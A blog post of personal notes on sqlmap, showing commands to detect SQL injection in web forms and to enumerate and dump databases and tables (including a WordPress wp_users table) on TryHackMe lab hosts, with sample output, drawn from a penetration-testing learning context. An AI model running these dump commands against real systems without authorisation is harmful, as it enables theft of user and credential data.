Skip to main content

sqlmap: Notes

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

apt install sqlmap

sqlmap -u http://10.10.239.79 --forms --dump

Use sqlmap with Burp Suite

sqlmap -r filename-saved-from-burpsuite

sqlmap -r sqlinjection2 --tamper=space2comment --dbms=sqlite --dump --level 5

Example: Dump SQlite

# sqlmap -r sqli-day5 --level 2 --batch --dbms=SQlite --dump

List all databases

# sqlmap -u http://10.10.200.148/users/login.php -forms -batch --dbms=mysql --dbs
...
[19:05:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[19:05:23] [INFO] fetching database names
[19:05:24] [INFO] retrieved: 'information_schema'
[19:05:24] [INFO] retrieved: 'wackopicko'
available databases [2]:
[*] information_schema
[*] wackopicko
...

List tables in a database

sqlmap -u http://10.10.200.148/users/login.php -forms -batch --dbms=mysql -D wackopicko --tables
...
[19:09:12] [INFO] testing MySQL
[19:09:12] [INFO] confirming MySQL
[19:09:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.0.0
[19:09:13] [INFO] fetching tables for database: 'wackopicko'
[19:09:13] [INFO] retrieved: 'admin'
[19:09:14] [INFO] retrieved: 'admin_session'
[19:09:14] [INFO] retrieved: 'cart'
[19:09:14] [INFO] retrieved: 'cart_coupons'
[19:09:14] [INFO] retrieved: 'cart_items'
[19:09:15] [INFO] retrieved: 'comments'
[19:09:15] [INFO] retrieved: 'comments_preview'
[19:09:15] [INFO] retrieved: 'conflict_pictures'
[19:09:15] [INFO] retrieved: 'coupons'
[19:09:15] [INFO] retrieved: 'guestbook'
[19:09:16] [INFO] retrieved: 'own'
[19:09:16] [INFO] retrieved: 'pictures'
[19:09:16] [INFO] retrieved: 'users'
Database: wackopicko
...

Exampe dumb data from wp_users table of wordpress database

sqlmap -u http://wekor.thm/it-next/it_cart.php --forms --dbms=mysql -D wordpress -T wp_users --dump --batch

Reference

>>> sqlmap cheat sheet

>>> THM | 25 Days of Cyber Security - Day 5

Practice

>>> https://tryhackme.com/room/ccpentesting

>>> The Cod Caper | Task 4 - Web Exploitation

>>> THM Advant of Cyber 2 | Task 10 - Day 5

>>> THM | SQL Injection Lab

>>> THM | 25 Days of Cyber Security - Day 5

>>> THM | Wekor

>>> THM | WebAppSec 101

Labels

Labels:

Popular posts from this blog

Hydra: Notes

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Read more

Install Microsoft .NET Core SDK

.NET Core Software Development Kit (SDK) is a set of libraries and tools that allow developers to create .NET Core applications and libraries.
Read more

ManageEngine ServiceDesk Plus - Reset password

Let's reset the default administrator's password to 'admin'
Read more